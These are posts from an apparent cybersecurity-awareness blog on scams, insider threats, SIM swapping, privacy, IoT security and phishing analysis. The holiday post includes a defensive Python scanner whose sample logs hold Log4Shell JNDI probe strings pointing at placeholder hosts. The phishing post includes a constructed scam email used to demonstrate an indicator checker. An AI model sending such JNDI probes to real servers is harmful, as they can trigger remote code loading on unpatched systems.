So, how did OFAC obtain jurisdiction to issue policy on ransomware? Well, the International Emergency Economic Powers Act (IEEPA) or the Trading with the Enemy Act (TWEA) delegates jurisdiction to OFAC. Now, as part of this jurisdiction, they are responsible not only for creating the lists of entities that U.S. citizens cannot conduct transactions with, but also for enforcing those embargoes.

In next week’s blog I will discuss some of the things that organizations can do to protect themselves from becoming a victim of a ransomware attack.

References


Get Ready for the Holidays and Potential Cyber Attacks

by Eula Chua

November 16, 2022

We’re heading into the most wonderful time of the year. While some of us are getting ready for our upcoming Thanksgiving dinners, others are already preparing Christmas presents. Either everything goes smoothly or it doesn’t.


You may ask, “what do the holidays even have to do with cybersecurity?”


Everything.


Think about it. All the retail shops are busy getting ready to stock up for all the holiday sales. We’re busy thinking about what gifts to buy for each of our family members or panicking about what to cook for our upcoming dinner gatherings. Others are getting ready to fly out for vacation. These are some honourable mentions.


While we’re occupied with a million things to do during this season, adversaries are also doing the same.


Have you heard of the Log4J vulnerability, Log4Shell?


Log4J is a built-in software library within Java that was created by an open-source project maintained by the Apache Software Foundation. It logs activities within a web server by tracking and monitoring system calls. The Log4Shell vulnerability was discovered in December 2021 and involves arbitrary code execution (ACE). Depending on the Log4J version being used by the application, Log4Shell enables an attacker to remotely control a device on the Internet. This was being done before IT/cyber professionals discovered it, which is why it is called a zero-day vulnerability.
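Since Log4J logs web-server activity, the defender's first question after Log4Shell was whether the lookup string that triggers it ever appeared in their request logs. The following is an added example (not from the blog) that scans access-log lines for that string, decoding percent-encoding first because the probe is often logged still URL-encoded. The sample lines are constructed and the hosts in them are documentation placeholders, not real indicators.

```python
"""Find Log4Shell-style JNDI lookup strings in web access logs.

Added example; SAMPLE_LOG is constructed (198.51.100.0/24 is a documentation
address range and the *.example hosts are placeholders).
"""

import re
from typing import Dict, List
from urllib.parse import unquote

# A vulnerable Log4j evaluates "${jndi:<scheme>://host/...}" wherever it appears
# in a logged string (URL path, User-Agent header, and so on). Match the lookup
# prefix case-insensitively and capture the scheme for triage.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def decode_log_field(raw: str) -> str:
    """Undo percent-encoding until the text stops changing (bounded to three
    rounds), because the lookup string is often logged still URL-encoded."""
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line that contains a JNDI lookup."""
    hits: List[Dict[str, str]] = []
    for number, line in enumerate(lines, start=1):
        decoded = decode_log_field(line)
        match = JNDI_RE.search(decoded)
        if match:
            hits.append({
                "line": str(number),
                "scheme": match.group(1).lower(),
                "evidence": decoded.strip(),
            })
    return hits


# Constructed Apache-style access log lines: one benign request, one probe in
# the User-Agent field, and one percent-encoded probe in the request path.
SAMPLE_LOG = [
    '198.51.100.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:01:15 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fprobe.example%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```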


How about the Cadbury Easter Egg Scam?


Around April 2022, a message with a phishing link was circulating all over WhatsApp, advertising that consumers would receive a free Easter chocolate basket from Cadbury. Clicking on the link would take you to a web page where you could fill in your personal data. Eventually, Cadbury found out and issued a public alert.


If you noticed, both situations occurred near or during a holiday. Attackers very well know that people have a lot on their plates during busier seasons like these. By adding more on top of that, they would hope we’d fall into their traps.


How can we prepare for what’s to come? The best way to prevent this is awareness.


We don’t know what we don’t know. Awareness will help lead us to our solution.


Stay on top of the cyber attacks and learn about what occurs during holidays. Here are some great resources (but not limited to) that you can look into (some of these also include examples from the past):


Learn about the social engineering tactics and how attackers use this against us:

Learn how to prevent scams from happening:

Check out the rest of our Blog By CC page below for more cybersecurity topics!


References:

NOV 9, 2022

Resources and Tips to Help You Study for Your CompTIA Security+ Exam

by Eula Chua

November 9, 2022

Leading up to it, I had doubted myself. I didn’t think I was going to pass because my study habits weren’t perfect. But I remembered that I had made a commitment to myself from the beginning of this cybersecurity journey, to pass this exam even if it takes me multiple times to do it.

Last month, I’m happy to share that I finally earned my very first cybersecurity certificate: CompTIA Security+ SY0-601. Passing this exam truly affirmed my decision to begin a career in this field. The learning never stops.

Although everyone has their own way of studying, I want to share with you the resources and tips that have helped me successfully pass this exam. I cannot guarantee that you will pass the exam as what I’m sharing is based on my own experience, however, with the amount of time and work you put in, your success and efforts will show in the results. I hope that what I share helps you in any way.

Resources

The first thing I did was research and find the appropriate study material for Security+ that worked for me. This took some time until I finally decided which courses and practice exams to stick to. There are a lot of free/affordable resources available out there, especially on YouTube and Udemy. It can get overwhelming. Know your learning style and choose accordingly. Check out this page to learn about different learning styles: VAK 

For myself, I learn best by doing all three: learning by seeing/writing, listening, and doing. I made sure to use resources that would aid me in my learning. I chose multiple resources to ensure each topic is fully covered in-depth and explained in different ways to help me understand the concepts. Most of the courses listed include additional hands-on labs that are not a part of the exam but are there to reinforce your learning.

Here are the resources that have helped me:

For visual/auditory learning (learning by seeing/writing and listening):

For kinesthetic learning (learn by doing):

Here are other highly recommended resources that you may also prefer:

Tips

Are you thinking of taking the CompTIA Security+ certification? Let us know how you do on our LinkedIn post: https://www.linkedin.com/company/cybersecuritycentralorg/


Good luck with all your studies!


Check out Resources by CC for even more learning tech and infosec resources!

NOV 2, 2022

Insider Threat

by James Driscoll

November 2, 2022

There is one aspect of cybersecurity that gets very little fanfare. That aspect is the insider threat. An insider threat is, in my opinion, the most dangerous type of cybersecurity attack. I say that because most of the time it involves an employee of an organization, who obviously has inside knowledge of the organization and easier access to the data than an outsider would. Below is a recent case of an insider threat.

This past September, an information security designer by the name of Jareh Sebastian Dalke received a visit from the FBI in Denver, Colorado. Mr. Dalke was arrested and charged with three counts of violating the Espionage Act. Apparently, he reached out to someone he thought worked for a foreign government and told this individual that he had classified documents for sale. The two agreed to an $85,000 price. According to the story, in order to prove that what he had was legit, Mr. Dalke sent the foreign government official, who was actually an FBI agent, snippets of the documents which had the classification markings on them (Kelley, 2022).

This incident which occurred only two months ago is a perfect example of an insider threat, which is the subject of this blog. One disclaimer about this case. Mr. Dalke has only been charged with violating the Espionage Act. He is innocent until he is proven guilty by a jury of his peers (Kelley, 2022). I will discuss what an insider threat is, how to spot one, and what to do if you suspect there is an insider threat in your organization.

Before we can discuss what an insider threat is, we need to define what an insider is. Basically, an insider is anyone, whether an employee or a contractor, whom an organization trusts with access to its resources. It can also be a vendor, a custodian, or even a repair person. The Cybersecurity and Infrastructure Security Agency (CISA) has an extensive list of who could be considered an insider (Defining Insider Threats, n.d.).

The essence of an insider threat is the potential that an insider, which was described above, will use their access or knowledge of their organization’s resources for nefarious reasons. According to CISA, those reasons include:

An insider threat can take one of three forms:

Other threats:

Let's take a look at what may be indicators of an insider threat. One thing to keep in mind regarding any indicators is that just because an employee (remember from above that most cases of insider threat involve employees) shows any one of these signs does not necessarily mean they are an insider threat. What needs to be noted is when an employee shows several of the signs below. The takeaway? If something does not seem right, say something to your supervisor or manager:

An example of an employee showing multiple indicators is as follows: an employee is overly critical of a poor performance appraisal, which he got because he is distracted due to financial issues resulting in his wife filing for divorce. These things make this employee vulnerable. One day he starts showing up to work in fancy cars and wearing newer clothes he normally does not wear. A week later he puts in for a vacation to a country that he cannot normally afford to go to, nor does he have an official reason to go. So, as we can see one indicator by itself is probably meaningless however, when stacked together, it becomes something that needs to be reported.


References

Credit Card Fraud: Tips For Prevention

by Eula Chua

November 2, 2022

Black Friday, Cyber Monday, and Boxing Day are coming before we know it. As we head into the holiday shopping season, I want to bring some awareness to credit card fraud.

As reported in the 2020 Federal Trade Commission Report, credit card fraud is ranked as one of the main types of identity theft reported and continues to rise.

Credit card fraud is an act of obtaining another individual’s credit card information without authorization or their knowledge, by placing random, unusual purchases, withdrawing funds, or creating new accounts. The fraudster’s main motive here is financial gain.

Credit card fraud happens more often than we think. To get a grasp of how it’s looking, check out Card Rates.com: 15 Disturbing Credit Card Fraud Statistics

Credit card fraud can occur in multiple ways, not limited to:

Although large-scale companies have fraud investigation and data loss prevention teams that work endlessly in the back end, doing our part as users and credit card owners, in combination with those back-end teams, will help effectively prevent credit card fraud from happening to us.

What can we do right now?

Here are some practical tips we can do to prevent or to stop credit card fraud:


Resources:

OCT 26, 2022

Vishing Attacks in Depth

by Eula Chua

October 26, 2022

Once upon a time, we lived in a world without caller ID. Every time the phone rang, all we could do was answer it, hoping it wouldn’t be a random stranger trying to impersonate a service provider. It was highly likely that an adversary would pull this scam tactic.


You might ask, what is vishing?

Vishing is a form of phishing — a portmanteau of “voice phishing”. This occurs when an attacker utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. As caller ID became a necessity in the telecom world, it helped filter out which phone numbers should be trusted based on what we know. But even then, attackers still found ways to overcome this challenge, which is why it still happens occasionally. At present, VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID and setting up fake phone numbers that are difficult to track.


In vishing attacks, the adversary falsifies their identity by pretending to be a person of authority. The common vishing attacks that many hear about relate to tech support scams and automated scare-tactic voice messages. To be effective, most attacks similar to this are combined with other types of attacks such as identity fraud or ransomware attacks.


So, do they still happen?


The answer is yes.


Although phishing scams are more popular, according to Kroll (2022), vishing attacks have been on the rise, especially in 2022, and have been “occurring more than 1-in-4 times out of all types of response-based threats.” The more that technology develops, the more sophisticated and motivated these adversaries are to find ways to create these cyber attacks.


Below are some key patterns we all need to be aware of when encountering potential vishing attacks. For some extra context, here is a list of vishing attack principles compiled by the experts of Kroll (The Rise of Vishing and Smishing Attacks – The Monitor, Issue 21 | Kroll) for reference:







To avoid falling for vishing attacks, it is important to be aware of the characteristics and traits. Knowing how an attack works gives users the advantage to prevent future cyber incidents.


A few key points to remember:



As we are in the last week of Cybersecurity Awareness Month, let’s continue to strive staying safe online. Continue to protect your information and always stay vigilant. As mentioned earlier, the more technology develops, the more threat actors discover ways to trick users.


Remember, cybersecurity criminals never sleep! #Becybersafe all year round and keep an eye out for more related content here at Cybersecurity Central!

SIM Swapping

by James Driscoll

October 26, 2022

This week the topic discussed is SIM swapping. The reason I chose this topic is a news story that came out early last week. On 18 October, Verizon revealed that their prepaid service was attacked using SIM swapping (Gatlan, 2022). A few things discussed today will be: 1) what SIM swapping is, 2) how a SIM swap works, 3) indicators of an attack, and 4) how to defend against this attack.

So, let us look at what SIM swapping, also known as SIM hijacking, is. It is pretty much what it sounds like: moving the SIM card or eSIM from one device to another. The key here is that it is the criminal doing the swapping, not the victim (SIM Swapping, n.d.). There are two reasons criminals engage in this type of attack: 1) to take advantage of the SMS messaging that some organizations use for their MFA, and 2) to take advantage of accounts where MFA is not set up (What is a SIM Swap, n.d.).

Now, let us move on and look at how this type of attack works. The typical SIM swapping attack starts with the victim giving the criminal their login credentials through a phishing email (SIM Swapping, n.d.). This gives the criminal access to the victim’s online account. A second part of this attack involves the criminal taking over the victim’s email account that is associated with the cell phone account (SIM Swapping, n.d.). The reason for this is that it allows the criminal to intercept any email correspondence from the phone company to the victim. Typical emails include confirmation that there was a change to the account, or One Time Passcodes (OTP), the six digits used for authentication.

Once the criminal has control of the victim’s email and has the login credentials for the account, they can conduct the SIM swapping attack. This can be done in a few ways: 1) online, using the login credentials received through the phishing email; 2) in person, either by phone or by the criminal going into the phone company’s physical location (Cryptopedia Staff, 2021). One thing to keep in mind is that no matter how this is done, there is going to be social engineering involved.

So, how can a person tell if they are a victim of a SIM swap? As it turns out there are three indicators a person might be a victim of an attack. 1) The victim cannot access their online account. 2) There is no service despite being in an area with good reception. 3) The victim somehow receives a notification about account changes they did not make (Adamu, 2022).

Now that we have looked at what a SIM swap attack is and how to spot one, let us now move onto what can be done to protect ourselves from being a victim. Believe it or not, there is a lot we can do. Below are seven recommendations:









References

OCT 19, 2022

Five Eyes Alliance and Privacy 

by James Driscoll

October 19, 2022

Over the past couple of weeks, a few news stories I have seen and a few podcasts I listen to have started to talk about a group that I have not heard about in a long time. That group is called the Five Eyes. I remember the first time I heard of them a couple of years ago. So, for those people that are not familiar with them, this blog is specifically designed for you, as I will talk about who they are, what their purpose is, and other interesting tidbits of information that may be relevant, plus how this relates to privacy.

So, what exactly is Five Eyes? Five Eyes is an alliance between the United States, the United Kingdom, Australia, Canada, and New Zealand. This alliance was formed in 1946 with the purpose of making it easy for the countries in the alliance to share surveillance and intelligence information with each other (Five Eyes, n.d.). Now, the types of intelligence that this alliance focuses on are human intelligence, signals intelligence, geo intelligence, and finally defense intelligence (Taylor, 2022).

Would it surprise anyone that, in addition to the Five Eyes Alliance, there is also a Nine Eyes Alliance? This alliance is made up of the Five Eyes countries plus the following: Denmark, France, the Netherlands, and Norway. The goal of this alliance is the same as that of the Five Eyes Alliance. Now, I would imagine some people are thinking that nine countries sharing intelligence information is not too bad. Just wait a minute, I have one more alliance to go over. The final alliance is called 14 Eyes. It is made up of the Nine Eyes countries plus Germany, Belgium, Italy, Sweden, and Spain (Taylor, 2022).

So, what do these alliances have to do with our privacy? Well, remember that the goal of these alliances (more specifically the Five Eyes Alliance) is to share surveillance and intelligence information. What everyone needs to pay attention to is the surveillance portion of that goal. The reason I say specifically the Five Eyes Alliance is that the United Kingdom and the United States are considered the biggest violators in terms of privacy.

For example, the United Kingdom passed a law in 2016 that basically tells both Internet Service Providers and phone companies to record things like browsing history, connection times and text messages for a period of two years. Also, that information must be made available to authorities whenever they ask for it. A warrant is not required (Taylor, 2022).

The reason the United States made the list of the biggest privacy violators is that not only is it conducting mass surveillance similar to the United Kingdom’s under a program called PRISM, but in 2017 Internet Service Providers became authorized not only to collect users’ information but also to sell it to other organizations (Taylor, 2022).

So, let’s pivot and discuss what we as individuals can do to protect our privacy. First, we can get away from email providers like Yahoo and Gmail. The reason is that Yahoo has been caught scanning users’ emails on behalf of the US Government. The reason for getting rid of Gmail is that it has been caught letting users’ emails be accessed by third parties. Now, I would bet some people are asking what email providers we are supposed to use that are more secure. You’re in luck, as I have you covered with nine options:

I know what you are thinking reading this list and you are correct in that some of them are in one of the other alliances. Keep in mind that we are focusing on avoiding the Five Eyes Alliance specifically. That is not to say that the other alliances do not violate privacy, I would imagine they do, but to a lesser extent (Taylor, 2022).

Another option that is available to all of us to protect our privacy is to use a Virtual Private Network (VPN). For those that do not know what a VPN does, it encrypts traffic between a user’s device and the VPN server. This makes it impossible for an ISP not only to read the traffic being sent, but also to determine a user’s IP address and location. One thing to look for when choosing a VPN is to ensure that the company does not keep logs. The reason for that is that if there are logs, then authorities in the country the VPN is in can request access to them, which defeats the whole point of using a VPN to ensure privacy.

The digital privacy advocacy group Restore Privacy has a list of nine VPN providers they recommend; however, of those nine, only three have been certified as not collecting logs. The nine that are recommended include:


Below are the three VPN providers that are certified to not collect logs.


There is one final thing that we all can do to protect our privacy. That is to stop using insecure search engines such as Google and Bing, just to name the main ones, and move to more secure search engines. There are four that are outside the Five Eyes Alliance, which include:

There are also three that while they are located within the Five Eyes Alliance, are still recommended due to their privacy policies. They are:

One thing to remember is that the above recommendations are not an all-inclusive list of what we can do to ensure our privacy. One thing missing is web browsers. There are more secure browsers than Chrome and Edge.

Basically, what this comes down to is trust. With the information that has been provided, do you trust that your privacy is ensured with what you are currently using? Before we as individuals can answer that question, we all need to look at our own situation and threat model, and whether an adversary would have a reason to target us. We also need to determine if we are comfortable with our governments basically having unrestricted access to our information.

References

Analyzing a Smishing Attack

by Eula Chua

October 19, 2022

Phishing attacks have become more sophisticated and found their way to other avenues. This week, I will be helping you analyze a Smishing attack.

A Smishing attack is part of the phishing family. It’s a cyber attack where text messages are sent by an attacker to trick victims into clicking a malicious link, sharing sensitive information, or sending money to a “trusted” organization. The characteristics and motives are almost identical except for the fact that it’s sent via SMS. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.

Since text messages do not have a dedicated spam folder, we cannot filter them out. They come through easier and are more likely to be opened by users who are unaware whether they are spam or not.

The following image is an example of a text message I received from someone claiming to be the “Canada Revenue Agency” or CRA. In America, the equivalent would be the IRS (Internal Revenue Service). From the perspective of a user, it may be hard to identify whether this is coming from the actual agency.

In regards to this example, here are some questions to ask:

Smishing schemes are made to create doubt in our thought process. This is one of the main tactics of conducting a successful attack. To help combat this, the questions you ask yourself will lead you to make the right judgement, especially if you’re not sure when you encounter a text message like this. I recommend approaching text messages like these with a curious mind. Think critically and ask yourself questions. If you feel like something is fishy, then you’re probably right.

Instead of me listing out what may be suspicious about this, I want you to try figuring out this one. Take out a pen and paper or your digital notes. What are some of the red flags you see in this text message? 

Share it with us by snapping a photo or a screenshot and send it in our LinkedIn comments section of this week’s #BlogByCC post!

OCT 12, 2022

Trust Your Gut - Analyzing a Phishing Email

by Eula Chua

October 12, 2022

Phishing is one of the most common cyber attacks used in today’s world. It uses a combination of social engineering techniques to lead a target into sending sensitive information for financial gain or to gain access to critical resources. To read more about phishing, click here for my previous post.

As we celebrate #CybersecurityAwarenessMonth, this week we will analyze a phishing email that landed in my spam/junk folder. We will use Phishing.org’s Common Features of Phishing Emails as a guide to distinguishing an illegitimate email by its writing style, the sender’s address, the links it carries, and other indicators. This demonstration is for educational purposes only: I do not recommend sifting through your spam folder, as the links in those messages may lead to malicious sites or malware (unless an email you were expecting from a reliable source somehow landed there; don’t worry, it happens). Some emails get past the filter and land in your inbox, so here is what to watch out for when you come across one.

Exhibit A: Money Transfers:


Many of the phishing emails I’ve seen almost always involve money. This one in particular says I will be sent an incredible amount of money, but for what? Why would “FBI Headquarters” contact me from a throwaway test address (test@rapidsms.net) under a name I don’t recognize (I personally don’t know anyone named Christopher A. Wray)? That name belongs to the real FBI Director, which is exactly why the scam borrows it; the sending domain, not the display name, tells you who actually sent the message, and it is not fbi.gov.

If you read the email, you will notice that the opening sentence lists real organizations to make the message look legitimate, even though you may never have used any of their services. You will also notice that the grammar and punctuation are wrong. The person you are told to contact does not have an official Western Union email address either.

Checking this against the common features of phishing emails, we can conclude that this email is too good to be true and that it came from an unusual sender. There is also a sense of urgency, since we are told there is a deadline to lodge the claim, though it is not as heavily emphasized as in other phishing emails that lean on that tactic.
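To make those checks mechanical, here is an added example (my own code, not from Phishing.org or the original post) that parses a constructed email modelled on the one above and flags the same indicators: a display name that claims an organization the sending domain does not belong to, a generic “test” mailbox, money and urgency language, and link text that shows one domain while the href points at another. The brand-to-domain table, the generic-mailbox list and the keyword patterns are assumptions for the demo, not a vetted ruleset; it runs with the standard library only.

```python
"""Flag common phishing indicators in a raw email (added example; the sample
message, the brand-to-domain table and the keyword patterns are assumptions)."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the email discussed above (not the real message).
SAMPLE_EML = """\
From: "FBI Headquarters - Christopher A. Wray" <test@rapidsms.net>
To: victim@example.com
Subject: URGENT: Your $10,500,000.00 compensation fund
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Attention beneficiary, your fund of $10,500,000.00 has been approved by the
Federal Bureau of Investigation in conjunction with Western Union and the IMF.
You must lodge your claim within 48 hours or forfeit the payment.</p>
<p>Contact the Western Union director here:
<a href="http://wu-claims.example.net/pay">https://www.westernunion.com/claim</a></p>
</body></html>
"""

# Organizations scammers like to name-drop and the domains they really send from (assumed).
IMPERSONATED_BRANDS = {
    "fbi": {"fbi.gov"},
    "western union": {"westernunion.com"},
    "irs": {"irs.gov"},
}
REAL_DOMAINS = set().union(*IMPERSONATED_BRANDS.values())
GENERIC_MAILBOXES = {"test", "noreply", "admin", "info"}
MONEY_WORDS = re.compile(r"\$\s?\d[\d,]*(?:\.\d{2})?|\b(?:fund|compensation|payment|transfer)\b", re.I)
URGENCY_WORDS = re.compile(r"\b(?:urgent|immediately|within \d+ hours|deadline|forfeit)\b", re.I)
URL_LIKE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?", re.I)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Crude 'last two labels' registrable domain; fine for .com/.net/.gov demos."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def analyze_email(raw):
    """Return a list of human-readable indicators found in an RFC 822 message string."""
    msg = message_from_string(raw, policy=policy.default)
    display_name, addr = parseaddr(msg.get("From", ""))
    local_part, _, host = addr.partition("@")
    sender_domain = registered_domain(host) if host else ""
    part = msg.get_body(preferencelist=("html", "plain"))
    body = part.get_content() if part is not None else ""
    subject = msg.get("Subject", "")
    findings = []

    # 1. Claimed identity (display name, subject, body) vs. the domain that really sent it.
    haystack = f"{display_name} {subject} {body}".lower()
    for brand, domains in IMPERSONATED_BRANDS.items():
        if re.search(r"\b" + re.escape(brand) + r"\b", haystack) and sender_domain not in domains:
            findings.append(f"mentions '{brand}' but was sent from {sender_domain or 'unknown domain'}")

    # 2. A generic or test mailbox on an unrelated domain is an unusual sender.
    if local_part.lower() in GENERIC_MAILBOXES and sender_domain not in REAL_DOMAINS:
        findings.append(f"sender mailbox '{local_part}' is generic")

    # 3. Money and urgency language.
    if MONEY_WORDS.search(body):
        findings.append("body promises or demands money")
    if URGENCY_WORDS.search(body) or URGENCY_WORDS.search(subject):
        findings.append("urgency / deadline language")

    # 4. Link text that shows one domain while the href goes to another.
    if part is not None and part.get_content_type() == "text/html":
        collector = _LinkCollector()
        collector.feed(body)
        for href, text in collector.links:
            if not URL_LIKE.fullmatch(text):
                continue  # plain words like "click here" cannot claim a domain
            href_host = urlparse(href).hostname or ""
            text_host = urlparse(text if "://" in text else "http://" + text).hostname or ""
            if text_host and registered_domain(text_host) != registered_domain(href_host):
                findings.append(f"link text shows {text_host} but points to {href_host}")
    return findings


if __name__ == "__main__":
    for finding in analyze_email(SAMPLE_EML):
        print("-", finding)
```

Each finding maps to one of the Phishing.org features: unusual sender, mismatched identity, too good to be true, urgency, and hyperlinks that do not go where they claim. Run against the sample it reports all six; run against a plain “see you at lunch” note it reports nothing.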

Can you find any more noticeable traits about this email that we haven’t mentioned yet? Let us know! Remember to review the common features of phishing emails and if you’re unsure whether an email you received came from the right source, use your best judgment. Next week, we will continue to practice analyzing other phishing emails, this time involving “order transactions” from a "legitimate” company. Until then, trust your gut and don’t open that suspicious email!

Securing IoT Devices

by James Driscoll

October 12, 2022

What exactly are IoT devices? IoT stands for “Internet of Things”; they are also known as smart devices. Now, let me ask what comes to mind when you hear the term “IoT device”? I would bet a lot of the answers are going to be the Amazon Echo or the Google Home, am I correct? There are a lot more than just those two. The list includes smart refrigerators, smart watches, smart fire alarms, smart door locks, smart bicycles, medical sensors, fitness trackers, smart security systems, and so on (18 Most Popular IoT Devices in 2022, 2022).

While IoT devices are great in that they make our lives a little bit easier, they do have one serious flaw. IoT devices are configured for ease of setup / use, not security or privacy. To prove my point, I looked for a story regarding baby monitors being hacked. Yes, certain models of baby monitors are IoT devices.

Stories like this made the news every couple of months a few years ago, though we do not hear much about them now.

The story I found is from 2018, about a mother in South Carolina who noticed unusual activity on her baby monitor. One morning she woke up and saw that the monitor was pointed directly at her. She thought it was odd but dismissed it, since her husband was known to move the camera through the app on his phone to check on her while he was at work. That seems logical to me; I have something similar (not a baby monitor) that I can use to check on my wife while I am gone. The second incident, however, has no innocent explanation. While the husband and wife were having dinner together, the wife got an alert on her phone that the camera was moving, yet they were both at home in the same room and neither had opened the app. What she did next was the best thing she could do: she not only disconnected the baby monitor but also called law enforcement.

When an officer arrived, the wife described what happened and said she suspected the baby monitor had been hacked. The officer decided to test that theory and had her reconnect everything, and that is when she discovered she had been locked out of her own account (Domonoske, 2018). Pretty scary stuff.

Now some of you may be wondering how this happened. Remember what I said earlier: IoT devices are configured for ease of setup and use, not security or privacy. Keep in mind as well that these devices can have vulnerabilities you do not see on computers, such as flaws that let a device be reset to its default settings, login credentials included. I mention that because in the story, when the monitor was set up, the password was changed to something unique to the device and not used anywhere else (Domonoske, 2018).

After reading this story, I am willing to bet some of you are wondering whether IoT devices can even be secured, and my answer is yes. In fact, there are six steps you can take. One disclaimer: the cited site lists seven tips and I am listing six, because I combined changing the login ID and password into a single item.

1. Start with configuring the router correctly.

a. Do not use default credentials. Change both the login ID and password.

b. Use the highest level of encryption the router supports. You are looking for WPA3, or WPA2 with AES/CCMP (not TKIP). If the router offers nothing better than WEP or the original WPA, you need a newer model.

2. Put IoT devices on their own network separate from everything else.

a. Basically, create a guest network for IoT devices, ideally a separate SSID or VLAN with client isolation turned on. If an IoT device is compromised, the attacker then cannot reach the computers and phones on the main network.

3. Another option is to turn off features you are not going to use.

4. Update the device’s firmware. Keep in mind that this usually does not happen automatically, so it may have to be done manually. Enable automatic updates where the device offers them; otherwise, set a calendar reminder once a quarter or so and follow the update directions that should be included in the device’s documentation.

5. Implement MFA if available. Now, I know that this option is a little counterintuitive as it takes the ease of use out of the device, but it will add to the security.

6. Use a secondary Next-Generation Firewall (NGFW). Most routers built in the last few years have a built-in firewall, but it may not offer the protection you want. In that case, an NGFW used in conjunction with the router would do the trick (Goodreau, n.d.).

So, the bottom line is that we, as the end users of these products, are responsible for our own security. We cannot rely on manufacturers to be security minded. As I have said a couple of times in this blog, manufacturers want a product that is easy to set up and use, because that is what sells; a product that is hard to set up does not sell, and selling is what matters to them.

References

18 Most Popular IoT Devices in 2022 (Only Noteworthy IoT Products). (2022, September 24). Retrieved from Software Testing Help: https://www.softwaretestinghelp.com/iot-devices/#:~:text=Smart%20Mobiles%2C%20smart%20refrigerators%2C%20smartwatches,few%20examples%20of%20IoT%20products


Domonoske, C. (2018, June 5). S.C. Mom Says Baby Monitor was Hacked; Experts Say Many Devices are Vulnerable. Retrieved from NPR: https://www.npr.org/sections/thetwo-way/2018/06/05/617196788/s-c-mom-says-baby-monitor-was-hacked-experts-say-many-devices-are-vulnerable 


Goodreau, T. (n.d.). 7 Actionable Tips to Secure Your Smart Home and IoT Devices. Retrieved from IEEE Computer Society: https://www.computer.org/publications/tech-news/trends/7-actionable-tips-to-secure-your-smart-home-and-iot-devices 




OCT 5, 2022

Mindfulness is a Must

by Kimberly McKnight

October 5, 2022

One of the main reasons for naming my nonprofit Cybersecurity Central was to be a resource for those who desire to constantly learn more about tech, infosec, cybersecurity, and preparation for career development and reaching our human potential.


This particular blog post, and many of the topics I discuss personally, are around the human side of careers. I heard of mindfulness training and CBT, (cognitive behavioral therapy), but had no personal experiences using these resources myself, until recently. 


Mindfulness allows us to relocate confidence we may have lost, or never built within ourselves, it helps to focus on what is important and relates to our mission in our journey, and it is a complete gamechanger when discovered and tapped into.


For many reasons, things have been out of line for quite some time in my life, and the discovery of learning to change my mindset has been a true help in allowing me to realign and restructure plans and next steps in my tech and infosec career.


Below are some #mindset resources I use personally and want to share with you. If you have mastered this art and already possess a positive and confident mindset, share the resources with your network. It's mind-blowing to learn how many others are waiting to discover how to influence their own mindset and become the best versions of themselves they are capable of being. Leaders and influencers included! It's not just the n00bs full of insecurities. 


Aligned in Tech was the first podcast I found that still stuck to the tech theme but started to lean into mindset, and into how to rethink my value as a career changer and what I bring to the table. The shows cover several things I had heard before, but captured so simply and delivered with support, from experience, that you can absorb them and make the mind shifts necessary to excel in our lives.


Brave to Be Multipassionate by Kate Kim was the next podcast I found, after seeing a post from Kate on LinkedIn. Wow! What a gem of a podcast! I have found more resources and individuals to follow from listening to her podcast than I can count! She hosts amazing guests who are more than research worthy, each with great initiatives and platforms themselves. Do yourself a favor and make this a must listen, (or watch now on YouTube), especially if you're anything like me and have passions in many places throughout your life. 


The next resource is Positively Living podcast from Lisa Zawrotny, whom I discovered while listening to Kate's Brave to Be Multipassionate podcast! Talk about hitting all the areas... Lisa covers everything from how to organize your LIFE, and how to have a positive and productive mindset while doing so. If you want to get organized, and learn various methods from multiple expert sources, this is a show for you. Add it to your list of favorites!


Last up, a self-help and self-therapy book, "The CBT Deck: 101 Practices to Improve Thoughts, Be in the Moment & Take Action in Your Life."  This is something I found on Amazon covering Cognitive Behavioral Therapy, CBT, specifically. Although the podcasts above may not mention CBT directly, I found that much of the mindset talk, insight, and help they provide goes right back to CBT. Instead of opting for the physical deck of cards (the "paperback" option on Amazon), I decided to go with the Audible version, where I can listen to the cards for anywhere from 5-15 minutes per day. Which method you prefer will depend on your style of intake; a Kindle version is also available. I can tell you that in the few weeks I've been using this, I have noted a big difference in my overall outlook and in my confidence in my abilities and BHAG goals.


Now that you have these resources for mindfulness, connect on social and let us know what you think! Feel free to tag @cybersecuritycentral in your posts! We would love to highlight and share your post!


If you haven't already, please be sure to check out Cybersecurity Central’s YouTube channel and subscribe to follow the latest! Follow us on LinkedIn at Cybersecurity Central


I greatly appreciate your support of Cybersecurity Central and can't thank you enough for tuning in each week to hang out with us!


Now go check out some of these insightful and inspiring mindfulness resources. You will not be disappointed!  


Cookie Policies & Privacy Pop-Ups

by James Driscoll

October 5, 2022

Imagine you are browsing the internet and come across a website that contains a popup screen, covering the entire page, like in the screenshot below. 


